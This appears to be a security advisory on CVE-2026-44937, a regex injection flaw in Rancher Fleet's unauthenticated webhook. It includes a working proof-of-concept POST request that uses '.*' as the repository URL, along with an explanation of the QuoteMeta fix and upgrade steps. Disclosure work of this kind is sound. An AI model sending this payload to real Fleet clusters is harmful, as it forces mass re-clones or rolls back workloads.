high · 7.5CVE-2026-44937Jul 1, 2026

CVE-2026-44937: Rancher Fleet Unauthenticated Webhook Regex Injection via Unsanitized Repository URL

Shubham Kandhare
Security Engagement Manager, SecureLayer7

When Fleet's webhook endpoint runs without a shared secret, an attacker can send a forged webhook request containing regex metacharacters in the repository URL or path field, causing Fleet to match an

Packagegithub.com/rancher/fleet
Ecosystemgo
Affected>= 0.15.0, < 0.15.2
Fixed in0.15.2

The problem

Fleet's gitjob webhook handler extracts the repository URL and path directly from the inbound HTTP payload and compiles them into a Go regular expression to find matching GitRepo resources. No authentication is required when no webhook secret is configured.

An attacker who sends a crafted POST request with a regex wildcard like `.*` as the repository URL will match every GitRepo on the management cluster, forcing repeated re-clones (resource exhaustion) or rolling back running workloads to any historical commit they can reference.

Proof of concept

A working proof-of-concept for CVE-2026-44937 in github.com/rancher/fleet, with the exact payload below.

http
POST /webhook HTTP/1.1
Host: fleet-gitjob.cattle-fleet-system.svc
Content-Type: application/json
X-Github-Event: push

{
  "ref": "refs/heads/main",
  "repository": {
    "url": ".*",
    "clone_url": ".*"
  },
  "commits": [
    {
      "added": [],
      "modified": [".*"],
      "removed": []
    }
  ]
}

The pre-patch code in `pkg/webhook/webhook.go` builds a `*regexp.Regexp` directly from the attacker-supplied `repository.url` and path values, then iterates all GitRepo objects testing each one with `re.MatchString(gitrepo.Spec.Repo)`. Supplying `.*` as the URL produces a pattern that matches every repo unconditionally.

The fix applies `regexp.QuoteMeta()` to both the URL and path strings before regex compilation, making all metacharacters literal. This is the standard Go idiom for treating user input as a plain string rather than a pattern. CWE-345 (Insufficient Verification of Data Authenticity) applies because the endpoint accepted and acted on unsigned, unvalidated input when no secret was set.

The fix

Upgrade Rancher Fleet to v0.15.2 (or v0.14.6, v0.13.11, v0.12.15 for older release lines). If an immediate upgrade is not possible, configure a webhook shared secret (`gitjob-webhook` Secret in `cattle-fleet-system`) so that unsigned requests are rejected before any URL matching occurs.

Reported by Radisauskas Arnoldas (NATO / NATO Cyber Security Centre).

References: [1][2]

Related research